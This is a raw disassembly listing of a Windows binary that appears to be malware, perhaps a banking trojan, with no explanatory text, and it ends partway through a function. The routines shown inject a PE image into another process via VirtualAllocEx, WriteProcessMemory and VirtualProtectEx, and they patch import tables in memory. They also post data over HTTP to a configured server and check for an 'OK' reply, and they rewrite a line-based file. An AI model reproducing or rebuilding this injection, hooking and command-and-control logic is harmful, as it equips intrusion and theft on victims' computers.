test eax, eax
jz loc_417657
lea eax, [ebp+var_8]
push eax
push [ebp+var_8]
push esi
call sub_41C873
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_14], eax
jz loc_417657
mov eax, [ebp+arg_0]
mov [ebp+var_20], eax
loc_417416: ; CODE XREF: sub_41735E+1BC�j
push 1
push [ebp+var_20]
call sub_41A1FA
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_18], eax
jz loc_417520
cmp byte ptr [eax], 21h
jnz short loc_417436
inc eax
mov [ebp+var_18], eax
loc_417436: ; CODE XREF: sub_41735E+D2�j
xor eax, eax
cmp [ebp+var_8], ebx
mov [ebp+var_10], eax
jbe loc_417509
loc_417444: ; CODE XREF: sub_41735E+1A5�j
mov ecx, [ebp+var_14]
lea eax, [ecx+eax*4]
mov [ebp+var_1C], eax
mov eax, [eax]
cmp eax, ebx
jz loc_4174F9
mov esi, eax
loc_417459: ; CODE XREF: sub_41735E+106�j
mov al, [esi]
cmp al, 20h
jz short loc_417463
cmp al, 9
jnz short loc_417466
loc_417463: ; CODE XREF: sub_41735E+FF�j
inc esi
jmp short loc_417459
; ---------------------------------------------------------------------------
loc_417466: ; CODE XREF: sub_41735E+103�j
mov al, [esi]
cmp al, 23h
jz loc_4174F9
cmp al, 0Dh
jz loc_4174F9
cmp al, 0Ah
jz short loc_4174F9
test al, al
jz short loc_4174F9
jmp short loc_417491
; ---------------------------------------------------------------------------
loc_417482: ; CODE XREF: sub_41735E+135�j
cmp al, 20h
jz short loc_417495
cmp al, 9
jz short loc_417495
test al, al
jz short loc_4174F9
inc esi
mov al, [esi]
loc_417491: ; CODE XREF: sub_41735E+122�j
cmp al, 9
jnz short loc_417482
loc_417495: ; CODE XREF: sub_41735E+126�j
; sub_41735E+12A�j
cmp [esi], bl
jz short loc_4174F9
loc_417499: ; CODE XREF: sub_41735E+146�j
mov al, [esi]
cmp al, 9
jz short loc_4174A3
cmp al, 20h
jnz short loc_4174A6
loc_4174A3: ; CODE XREF: sub_41735E+13F�j
inc esi
jmp short loc_417499
; ---------------------------------------------------------------------------
loc_4174A6: ; CODE XREF: sub_41735E+143�j
mov al, [esi]
cmp al, 23h
jz short loc_4174F9
cmp al, 0Dh
jz short loc_4174F9
cmp al, 0Ah
jz short loc_4174F9
test al, al
jz short loc_4174F9
push [ebp+var_18]
call dword_40FD94 ; lstrlenA
mov edi, eax
push edi
push edi
push esi
push [ebp+var_18]
call sub_41A493
add esp, 10h
test eax, eax
jnz short loc_4174F9
mov al, [edi+esi]
cmp al, 20h
jz short loc_4174EC
cmp al, 0Dh
jz short loc_4174EC
cmp al, 0Ah
jz short loc_4174EC
cmp al, 23h
jz short loc_4174EC
test al, al
jnz short loc_4174F9
loc_4174EC: ; CODE XREF: sub_41735E+17C�j
; sub_41735E+180�j ...
mov esi, [ebp+var_1C]
push dword ptr [esi]
call sub_41A83D
pop ecx
mov [esi], ebx
loc_4174F9: ; CODE XREF: sub_41735E+F3�j
; sub_41735E+10C�j ...
mov eax, [ebp+var_10]
inc eax
cmp eax, [ebp+var_8]
mov [ebp+var_10], eax
jb loc_417444
loc_417509: ; CODE XREF: sub_41735E+E0�j
push 2
push [ebp+var_20]
call sub_41A1FA
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_20], eax
jnz loc_417416
loc_417520: ; CODE XREF: sub_41735E+C9�j
or [ebp+var_10], 0FFFFFFFFh
push ebx
push ebx
push ebx
push [ebp+var_4]
call dword_40FDC8 ; SetFilePointer
push [ebp+var_4]
call dword_40FDF8 ; SetEndOfFile
xor esi, esi
cmp [ebp+var_8], ebx
jbe short loc_41756D
loc_417540: ; CODE XREF: sub_41735E+20D�j
mov eax, [ebp+var_14]
lea edi, [eax+esi*4]
mov eax, [edi]
cmp eax, ebx
jz short loc_417567
push ebx
lea ecx, [ebp+var_C]
push ecx
push eax
mov [ebp+var_10], esi
call dword_40FD94 ; lstrlenA
push eax
push dword ptr [edi]
push [ebp+var_4]
call dword_40FDF0 ; WriteFile
loc_417567: ; CODE XREF: sub_41735E+1EC�j
inc esi
cmp esi, [ebp+var_8]
jb short loc_417540
loc_41756D: ; CODE XREF: sub_41735E+1E0�j
mov edi, [ebp+arg_0]
mov esi, offset dword_401314
loc_417575: ; CODE XREF: sub_41735E+2DD�j
push 1
push edi
call sub_41A1FA
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_417641
cmp byte ptr [ebx], 21h
jz loc_41762D
cmp edi, [ebp+arg_0]
jnz short loc_4175D5
mov eax, [ebp+var_10]
cmp eax, 0FFFFFFFFh
jz short loc_4175D5
mov ecx, [ebp+var_14]
lea eax, [ecx+eax*4]
push dword ptr [eax]
mov [ebp+var_1C], eax
call dword_40FD94 ; lstrlenA
test eax, eax
mov [ebp+var_C], eax
jz short loc_4175D5
mov ecx, [ebp+var_1C]
mov ecx, [ecx]
cmp byte ptr [ecx+eax-1], 0Ah
jz short loc_4175D5
push 0
lea eax, [ebp+var_C]
push eax
push 2
push esi
push [ebp+var_4]
call dword_40FDF0 ; WriteFile
loc_4175D5: ; CODE XREF: sub_41735E+237�j
; sub_41735E+23F�j ...
push 0
lea eax, [ebp+var_C]
push eax
push edi
call dword_40FD94 ; lstrlenA
push eax
push edi
push [ebp+var_4]
call dword_40FDF0 ; WriteFile
push 0
lea eax, [ebp+var_C]
push eax
push 1
push offset asc_401288 ; " "
push [ebp+var_4]
call dword_40FDF0 ; WriteFile
push 0
lea eax, [ebp+var_C]
push eax
push ebx
call dword_40FD94 ; lstrlenA
push eax
push ebx
push [ebp+var_4]
call dword_40FDF0 ; WriteFile
push 0
lea eax, [ebp+var_C]
push eax
push 2
push esi
push [ebp+var_4]
call dword_40FDF0 ; WriteFile
loc_41762D: ; CODE XREF: sub_41735E+22E�j
push 2
push edi
call sub_41A1FA
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz loc_417575
loc_417641: ; CODE XREF: sub_41735E+225�j
push [ebp+var_4]
call dword_40FE00 ; FlushFileBuffers
push [ebp+var_8]
push [ebp+var_14]
call sub_41A8D2
pop ecx
pop ecx
loc_417657: ; CODE XREF: sub_41735E+91�j
; sub_41735E+AC�j
push [ebp+var_24]
call sub_41A83D
pop ecx
loc_417660: ; CODE XREF: sub_41735E+79�j
push [ebp+var_4]
call dword_40FDAC ; CloseHandle
pop esi
loc_41766A: ; CODE XREF: sub_41735E+59�j
pop edi
pop ebx
leave
retn
sub_41735E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41766E proc near ; CODE XREF: .data:00419CE9�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push ebx
lea eax, [ebp+var_10]
push eax
push offset dword_401328
push 1
xor ebx, ebx
push ebx
push offset dword_401318
call dword_40FC68
test eax, eax
jnz short loc_4176F2
mov eax, [ebp+var_10]
mov ecx, [eax]
lea edx, [ebp+var_C]
push edx
push eax
call dword ptr [ecx+1Ch]
test eax, eax
jnz short loc_4176E9
mov eax, [ebp+var_C]
mov ecx, [eax]
lea edx, [ebp+var_8]
push edx
push eax
call dword ptr [ecx+1Ch]
test eax, eax
jnz short loc_4176E0
mov eax, [ebp+var_8]
mov ecx, [eax]
lea edx, [ebp+var_4]
push edx
push eax
call dword ptr [ecx+20h]
test eax, eax
jnz short loc_4176D7
cmp [ebp+var_4], bx
jz short loc_4176D7
mov eax, [ebp+var_8]
mov ecx, [eax]
push ebx
push eax
call dword ptr [ecx+24h]
mov bl, 1
loc_4176D7: ; CODE XREF: sub_41766E+55�j
; sub_41766E+5B�j
mov eax, [ebp+var_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_4176E0: ; CODE XREF: sub_41766E+44�j
mov eax, [ebp+var_C]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_4176E9: ; CODE XREF: sub_41766E+33�j
mov eax, [ebp+var_10]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_4176F2: ; CODE XREF: sub_41766E+22�j
mov al, bl
pop ebx
leave
retn
sub_41766E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4176F7 proc near ; CODE XREF: .data:00419F3A�p
var_61C = byte ptr -61Ch
var_618 = byte ptr -618h
var_614 = byte ptr -614h
var_613 = byte ptr -613h
var_612 = byte ptr -612h
var_611 = byte ptr -611h
var_2C = byte ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 61Ch
push ebx
push esi
xor ebx, ebx
push ebx
push 2
push 2
call dword_40FCD4
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_41771D
xor al, al
jmp loc_4178A5
; ---------------------------------------------------------------------------
loc_41771D: ; CODE XREF: sub_4176F7+1D�j
push ebx
push ebx
lea eax, [ebp+var_C]
push eax
push 5F0h
lea eax, [ebp+var_61C]
push eax
push ebx
push ebx
push 4004747Fh
push esi
mov [ebp+var_C], ebx
call dword_40FCF0
push esi
call dword_40FCC0
mov eax, [ebp+var_C]
push 4Ch
xor edx, edx
pop ecx
div ecx
mov [ebp+var_2], 1
mov [ebp+var_10], ebx
mov [ebp+var_8], ebx
mov [ebp+var_1], bl
cmp eax, ebx
mov [ebp+var_C], eax
jbe loc_41789F
push edi
mov edi, [ebp+arg_4]
xor esi, esi
loc_41776F: ; CODE XREF: sub_4176F7+18E�j
imul esi, 4Ch
test [ebp+esi+var_61C], 1
jz loc_41787B
lea eax, [ebp+esi+var_618]
push eax
call sub_417324
test al, al
pop ecx
jnz loc_41787B
cmp [ebp+var_2], bl
jz loc_417821
lea eax, [ebp+var_14]
push eax
mov eax, dword_40FC1C
movzx ecx, byte ptr [eax+66h]
push ecx
movzx ecx, byte ptr [eax+64h]
lea eax, [ecx+eax+6Ch]
push eax
call sub_41AF95
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_8], eax
jz short loc_41781E
push eax
push [ebp+var_14]
call sub_41BC6D
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_18], eax
mov [ebp+var_8], ebx
jz short loc_417815
call dword_40FDE8 ; GetTickCount
mov [edi], eax
mov eax, dword_40FC1C
movzx eax, word ptr [eax+68h]
push ebx
push eax
lea eax, [ebp+var_10]
push eax
push [ebp+var_18]
push [ebp+arg_0]
call sub_417186
add esp, 14h
mov [ebp+var_8], eax
call dword_40FDE8 ; GetTickCount
sub eax, [edi]
push [ebp+var_18]
mov [edi], eax
call sub_41A83D
pop ecx
loc_417815: ; CODE XREF: sub_4176F7+E1�j
push [ebp+var_14]
call sub_41A83D
pop ecx
loc_41781E: ; CODE XREF: sub_4176F7+CC�j
mov [ebp+var_2], bl
loc_417821: ; CODE XREF: sub_4176F7+A2�j
cmp [ebp+var_8], ebx
jz short loc_41789E
movzx eax, [ebp+esi+var_611]
push eax
movzx eax, [ebp+esi+var_612]
push eax
movzx eax, [ebp+esi+var_613]
push eax
movzx eax, [ebp+esi+var_614]
push eax
mov eax, dword_40FB34
push dword ptr [eax+84h]
lea eax, [ebp+var_2C]
push 14h
push eax
call dword_40FC88
push ebx
push ebx
push ebx
push [ebp+var_8]
push [ebp+var_10]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_41A221
add esp, 38h
test al, al
jnz short loc_41788D
loc_41787B: ; CODE XREF: sub_4176F7+83�j
; sub_4176F7+99�j
inc [ebp+var_1]
movzx esi, [ebp+var_1]
cmp esi, [ebp+var_C]
jb loc_41776F
jmp short loc_417890
; ---------------------------------------------------------------------------
loc_41788D: ; CODE XREF: sub_4176F7+182�j
mov [ebp+var_C], ebx
loc_417890: ; CODE XREF: sub_4176F7+194�j
cmp [ebp+var_8], ebx
jz short loc_41789E
push [ebp+var_10]
call sub_41A83D
pop ecx
loc_41789E: ; CODE XREF: sub_4176F7+12D�j
; sub_4176F7+19C�j
pop edi
loc_41789F: ; CODE XREF: sub_4176F7+6C�j
cmp [ebp+var_C], ebx
setnz al
loc_4178A5: ; CODE XREF: sub_4176F7+21�j
pop esi
pop ebx
leave
retn
sub_4176F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4178A9 proc near ; CODE XREF: sub_4178FE+1A0�p
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 38h
mov eax, dword_40FB34
mov [ebp+var_4], 31h
push dword ptr [eax+68h]
lea eax, [ebp+var_38]
push eax
call dword_40FDA0 ; lstrcpyA
push 0
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_38]
push eax
push 0FFFFh
push [ebp+arg_0]
call dword_40FB60
test eax, eax
jz short loc_4178FA
cmp [ebp+var_4], 2
jnz short loc_4178FA
cmp [ebp+var_38], 4Fh
jnz short loc_4178FA
cmp [ebp+var_37], 4Bh
jnz short loc_4178FA
mov al, 1
leave
retn
; ---------------------------------------------------------------------------
loc_4178FA: ; CODE XREF: sub_4178A9+39�j
; sub_4178A9+3F�j ...
xor al, al
leave
retn
sub_4178A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4178FE proc near ; CODE XREF: .data:00418A2F�p
; .data:0041A17B�p
var_358 = byte ptr -358h
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 358h
push ebx
xor ebx, ebx
push ebx
push ebx
call sub_414A0E
test al, al
pop ecx
pop ecx
jz loc_417B17
push edi
lea eax, [ebp+var_8]
push eax
push 5
mov [ebp+var_8], ebx
call sub_414B1B
pop ecx
pop ecx
mov edi, eax
call sub_414AD3
cmp edi, ebx
jz loc_417B0B
cmp edi, 0C8h
ja loc_417B0B
push esi
push 3Ch
pop esi
lea eax, [ebp+var_54]
push esi
push eax
call sub_41BE72
pop ecx
pop ecx
lea eax, [ebp+var_158]
mov [ebp+var_44], eax
lea eax, [ebp+var_54]
push eax
push ebx
mov [ebp+var_54], esi
push edi
push [ebp+var_8]
xor esi, esi
inc esi
mov [ebp+var_40], 103h
mov [ebp+var_24], esi
mov [ebp+var_1C], esi
mov [ebp+var_1], bl
call dword_40FB58
test eax, eax
jz loc_417AFC
cmp [ebp+var_40], ebx
jbe loc_417AFC
cmp [ebp+var_48], 3
jz short loc_4179A6
cmp [ebp+var_48], 4
jnz loc_417AFC
loc_4179A6: ; CODE XREF: sub_4178FE+9C�j
push ebx
push ebx
push 3
push ebx
push ebx
push [ebp+var_3C]
lea eax, [ebp+var_158]
push eax
push [ebp+arg_0]
call dword_40FB48
cmp eax, ebx
mov [ebp+var_C], eax
jz loc_417AFC
cmp [ebp+var_48], 4
mov [ebp+var_14], 846CF300h
jnz short loc_4179DE
mov [ebp+var_14], 84ECF300h
loc_4179DE: ; CODE XREF: sub_4178FE+D7�j
push 1000h
call sub_41A81F
mov edi, eax
cmp edi, ebx
pop ecx
jz loc_417AF3
cmp [ebp+var_28], ebx
jnz short loc_417A02
mov [ebp+var_28], offset asc_401340 ; "/"
mov [ebp+var_24], esi
loc_417A02: ; CODE XREF: sub_4178FE+F8�j
cmp [ebp+var_20], ebx
jnz short loc_417A0A
mov [ebp+var_1C], ebx
loc_417A0A: ; CODE XREF: sub_4178FE+107�j
mov [ebp+var_1], 1
loc_417A0E: ; CODE XREF: sub_4178FE+1E8�j
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_358]
push eax
push [ebp+arg_C]
call [ebp+arg_4]
test al, al
jz loc_417AEC
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_24]
lea esi, [edi+eax]
add eax, ecx
push eax
push [ebp+var_28]
add esi, ecx
push edi
call sub_41A857
add esp, 0Ch
cmp [ebp+var_358], bl
jle short loc_417A6C
cmp [ebp+var_20], ebx
setz al
dec al
and al, 0E7h
add al, 3Fh
mov [esi], al
lea eax, [ebp+var_358]
push eax
inc esi
push esi
call dword_40FDA0 ; lstrcpyA
jmp short loc_417A6E
; ---------------------------------------------------------------------------
loc_417A6C: ; CODE XREF: sub_4178FE+14D�j
mov [esi], bl
loc_417A6E: ; CODE XREF: sub_4178FE+16C�j
push ebx
push [ebp+var_14]
push ebx
push ebx
push ebx
push edi
push offset aPost ; "POST"
push [ebp+var_C]
call dword_40FB4C
mov esi, eax
cmp esi, ebx
jz short loc_417AA8
push [ebp+var_18]
push [ebp+var_10]
push ebx
push ebx
push esi
call dword_40FB50
test eax, eax
jz short loc_417AA8
push esi
call sub_4178A9
test al, al
pop ecx
jnz short loc_417AAB
loc_417AA8: ; CODE XREF: sub_4178FE+18A�j
; sub_4178FE+19D�j
mov [ebp+var_1], bl
loc_417AAB: ; CODE XREF: sub_4178FE+1A8�j
push [ebp+var_10]
call sub_41A83D
cmp [ebp+var_1], bl
pop ecx
jz short loc_417ADC
cmp [ebp+arg_8], ebx
jz short loc_417AC8
push esi
push [ebp+arg_C]
call [ebp+arg_8]
mov [ebp+var_1], al
loc_417AC8: ; CODE XREF: sub_4178FE+1BE�j
; sub_4178FE+1DC�j
push ebx
push 1000h
push edi
push esi
call sub_417131
add esp, 10h
test eax, eax
jnz short loc_417AC8
loc_417ADC: ; CODE XREF: sub_4178FE+1B9�j
push esi
call dword_40FB40
cmp [ebp+var_1], bl
jnz loc_417A0E
loc_417AEC: ; CODE XREF: sub_4178FE+127�j
push edi
call sub_41A83D
pop ecx
loc_417AF3: ; CODE XREF: sub_4178FE+EF�j
push [ebp+var_C]
call dword_40FB40
loc_417AFC: ; CODE XREF: sub_4178FE+89�j
; sub_4178FE+92�j ...
push [ebp+var_8]
call sub_41A83D
mov al, [ebp+var_1]
pop ecx
pop esi
jmp short loc_417B16
; ---------------------------------------------------------------------------
loc_417B0B: ; CODE XREF: sub_4178FE+37�j
; sub_4178FE+43�j
push [ebp+var_8]
call sub_41A83D
pop ecx
xor al, al
loc_417B16: ; CODE XREF: sub_4178FE+20B�j
pop edi
loc_417B17: ; CODE XREF: sub_4178FE+17�j
pop ebx
leave
retn
sub_4178FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417B1A proc near ; CODE XREF: sub_41816A+88�p
; sub_4182DE+40�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebx+3Ch]
push edi
push 1
mov edi, 2000h
push edi
add esi, ebx
push dword ptr [esi+50h]
push dword ptr [esi+34h]
push [ebp+arg_0]
call dword_40FE3C ; VirtualAllocEx
test eax, eax
mov [ebp+var_4], eax
jnz short loc_417B67
push 1
push edi
push dword ptr [esi+50h]
push eax
push [ebp+arg_0]
call dword_40FE3C ; VirtualAllocEx
test eax, eax
mov [ebp+var_4], eax
jnz short loc_417B67
loc_417B60: ; CODE XREF: sub_417B1A+5B�j
; sub_417B1A+FD�j ...
xor eax, eax
jmp loc_417CC1
; ---------------------------------------------------------------------------
loc_417B67: ; CODE XREF: sub_417B1A+2D�j
; sub_417B1A+44�j
push dword ptr [esi+50h]
call sub_41A81F
test eax, eax
pop ecx
mov [ebp+var_C], eax
jz short loc_417B60
push dword ptr [esi+50h]
push ebx
push eax
call sub_41A857
mov ecx, [esi+0A0h]
add esp, 0Ch
test ecx, ecx
jz short loc_417BFD
cmp dword ptr [esi+0A4h], 0
jz short loc_417BFD
mov eax, [esi+34h]
mov edi, [ebp+var_4]
sub edi, eax
cmp [ebp+arg_8], 0
jz short loc_417BAC
sub ebx, eax
mov [ebp+var_10], ebx
jmp short loc_417BB0
; ---------------------------------------------------------------------------
loc_417BAC: ; CODE XREF: sub_417B1A+89�j
and [ebp+var_10], 0
loc_417BB0: ; CODE XREF: sub_417B1A+90�j
mov eax, [ebp+var_C]
add ecx, eax
jmp short loc_417BF8
; ---------------------------------------------------------------------------
loc_417BB7: ; CODE XREF: sub_417B1A+E1�j
mov edx, [ecx+4]
cmp edx, 8
jb short loc_417BF5
add edx, 0FFFFFFF8h
shr edx, 1
push 0
mov [ebp+var_8], edx
pop ebx
jz short loc_417BF5
loc_417BCC: ; CODE XREF: sub_417B1A+D9�j
movzx eax, word ptr [ecx+ebx*2+8]
test ax, ax
jz short loc_417BF0
and eax, 0FFFh
add eax, [ecx]
add eax, [ebp+var_C]
cmp [ebp+arg_8], 0
jz short loc_417BEB
mov edx, [ebp+var_10]
sub [eax], edx
loc_417BEB: ; CODE XREF: sub_417B1A+CA�j
add [eax], edi
mov edx, [ebp+var_8]
loc_417BF0: ; CODE XREF: sub_417B1A+BA�j
inc ebx
cmp ebx, edx
jb short loc_417BCC
loc_417BF5: ; CODE XREF: sub_417B1A+A3�j
; sub_417B1A+B0�j
add ecx, [ecx+4]
loc_417BF8: ; CODE XREF: sub_417B1A+9B�j
cmp dword ptr [ecx], 0
jnz short loc_417BB7
loc_417BFD: ; CODE XREF: sub_417B1A+72�j
; sub_417B1A+7B�j
mov edi, [esi+54h]
push 4
mov ebx, 1000h
push ebx
push edi
push [ebp+var_4]
push [ebp+arg_0]
call dword_40FE3C ; VirtualAllocEx
test eax, eax
jz loc_417B60
push 0
push edi
push [ebp+arg_4]
push [ebp+var_4]
push [ebp+arg_0]
call dword_40FE0C ; WriteProcessMemory
lea eax, [ebp+var_8]
push eax
push 2
push edi
push [ebp+var_4]
push [ebp+arg_0]
call dword_40FE40 ; VirtualProtectEx
movzx eax, word ptr [esi+14h]
and [ebp+arg_4], 0
cmp word ptr [esi+6], 0
lea eax, [eax+esi+18h]
jbe short loc_417CB5
lea edi, [eax+8]
loc_417C58: ; CODE XREF: sub_417B1A+199�j
mov eax, [edi+4]
add eax, [ebp+var_4]
push 4
push ebx
push dword ptr [edi]
push eax
push [ebp+arg_0]
call dword_40FE3C ; VirtualAllocEx
test eax, eax
mov [ebp+var_10], eax
jz loc_417B60
mov ecx, [edi+4]
add ecx, [ebp+var_C]
push 0
push dword ptr [edi]
push ecx
push eax
push [ebp+arg_0]
call dword_40FE0C ; WriteProcessMemory
push 40h
pop eax
lea ecx, [ebp+var_8]
push ecx
push eax
mov [ebp+var_8], eax
push dword ptr [edi]
push [ebp+var_10]
push [ebp+arg_0]
call dword_40FE40 ; VirtualProtectEx
movzx eax, word ptr [esi+6]
add edi, 28h
inc [ebp+arg_4]
cmp [ebp+arg_4], eax
jb short loc_417C58
loc_417CB5: ; CODE XREF: sub_417B1A+139�j
push [ebp+var_C]
call sub_41A83D
mov eax, [ebp+var_4]
pop ecx
loc_417CC1: ; CODE XREF: sub_417B1A+48�j
pop edi
pop esi
pop ebx
leave
retn
sub_417B1A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417CC6 proc near ; CODE XREF: sub_417DFB+101�p
var_20 = byte ptr -20h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, [ebp+arg_0]
push 1Ch
lea eax, [ebp+var_20]
push eax
push esi
push edi
xor ebx, ebx
call dword_40FE38 ; VirtualQueryEx
test eax, eax
jz short loc_417D34
cmp [ebp+var_C], 1
jz short loc_417D34
test word ptr [ebp+var_C], 100h
jnz short loc_417D34
cmp [ebp+var_14], ebx
jz short loc_417D34
lea eax, [ebp+var_4]
push eax
push 40h
push [ebp+arg_C]
push esi
push edi
call dword_40FE40 ; VirtualProtectEx
test eax, eax
jz short loc_417D34
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
push esi
push edi
call dword_40FE0C ; WriteProcessMemory
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push [ebp+var_4]
push [ebp+arg_C]
push esi
push edi
call dword_40FE40 ; VirtualProtectEx
loc_417D34: ; CODE XREF: sub_417CC6+21�j
; sub_417CC6+27�j ...
pop edi
xor eax, eax
test ebx, ebx
pop esi
setnz al
pop ebx
leave
retn
sub_417CC6 endp
; =============== S U B R O U T I N E =======================================
sub_417D40 proc near ; CODE XREF: sub_417F96+EE�p
arg_0 = dword ptr 4
push esi
mov esi, eax
test esi, esi
jnz short loc_417D88
push 4
push edi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_417DB2
cmp word ptr [edi], 5A4Dh
jnz short loc_417DB2
mov eax, [edi+3Ch]
add eax, edi
cmp dword ptr [eax], 4550h
jnz short loc_417DB2
lea esi, [eax+80h]
push 8
push esi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_417DB2
cmp [esi+4], eax
jz short loc_417DB2
mov esi, [esi]
test esi, esi
jz short loc_417DB2
add esi, edi
loc_417D88: ; CODE XREF: sub_417D40+5�j
push ebx
push 14h
push esi
xor bl, bl
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_417DE0
loc_417D98: ; CODE XREF: sub_417D40+9A�j
mov eax, [esi+0Ch]
test eax, eax
jz short loc_417DDC
push 2
add eax, edi
push eax
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jz short loc_417DB6
mov bl, 1
jmp short loc_417DCC
; ---------------------------------------------------------------------------
loc_417DB2: ; CODE XREF: sub_417D40+12�j
; sub_417D40+19�j ...
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_417DB6: ; CODE XREF: sub_417D40+6C�j
mov eax, [esi+0Ch]
push [esp+8+arg_0]
add eax, edi
push eax
xor bl, bl
call dword_40FD8C ; lstrcmpiA
test eax, eax
jz short loc_417DE0
loc_417DCC: ; CODE XREF: sub_417D40+70�j
push 14h
add esi, 14h
push esi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jz short loc_417D98
loc_417DDC: ; CODE XREF: sub_417D40+5D�j
test bl, bl
jnz short loc_417DF6
loc_417DE0: ; CODE XREF: sub_417D40+56�j
; sub_417D40+8A�j
push 14h
push esi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_417DF6
cmp [esi+0Ch], eax
jz short loc_417DF6
mov eax, esi
jmp short loc_417DF8
; ---------------------------------------------------------------------------
loc_417DF6: ; CODE XREF: sub_417D40+9E�j
; sub_417D40+AB�j ...
xor eax, eax
loc_417DF8: ; CODE XREF: sub_417D40+B4�j
pop ebx
pop esi
retn
sub_417D40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417DFB proc near ; CODE XREF: sub_417F96+72�p
; sub_417F96+C7�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
cmp [ebp+arg_C], 2
mov eax, [ebp+arg_4]
push edi
jnz short loc_417E12
mov eax, [eax+10h]
jmp short loc_417E14
; ---------------------------------------------------------------------------
loc_417E12: ; CODE XREF: sub_417DFB+10�j
mov eax, [eax]
loc_417E14: ; CODE XREF: sub_417DFB+15�j
test eax, eax
jz loc_417F06
mov ecx, [ebp+arg_0]
lea edi, [eax+ecx]
push 4
push edi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz loc_417ECA
push ebx
push esi
loc_417E35: ; CODE XREF: sub_417DFB+C7�j
mov eax, [edi]
test eax, eax
jz loc_417EC8
cmp [ebp+arg_C], 2
jnz short loc_417E4A
cmp eax, [ebp+arg_8]
jmp short loc_417EB2
; ---------------------------------------------------------------------------
loc_417E4A: ; CODE XREF: sub_417DFB+48�j
cmp [ebp+arg_C], 0
jnz short loc_417E5C
test eax, eax
jns short loc_417EB4
movzx eax, ax
cmp [ebp+arg_8], eax
jmp short loc_417EB2
; ---------------------------------------------------------------------------
loc_417E5C: ; CODE XREF: sub_417DFB+53�j
cmp [ebp+arg_C], 1
jnz short loc_417EB4
test eax, eax
js short loc_417EB4
mov ecx, [ebp+arg_0]
lea esi, [eax+ecx]
lea eax, [ebp+var_4]
push eax
push 40h
push 4
push esi
push dword_40FB30
call dword_40FE40 ; VirtualProtectEx
test eax, eax
jz short loc_417EB4
push 0FFFFFFFFh
push 0FFFFFFFFh
push [ebp+arg_8]
lea eax, [esi+2]
push eax
call sub_41A493
add esp, 10h
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push [ebp+var_4]
push 4
push esi
push dword_40FB30
call dword_40FE40 ; VirtualProtectEx
test ebx, ebx
loc_417EB2: ; CODE XREF: sub_417DFB+4D�j
; sub_417DFB+5F�j
jz short loc_417EC8
loc_417EB4: ; CODE XREF: sub_417DFB+57�j
; sub_417DFB+65�j ...
push 4
add edi, 4
push edi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jz loc_417E35
loc_417EC8: ; CODE XREF: sub_417DFB+3E�j
; sub_417DFB:loc_417EB2�j
pop esi
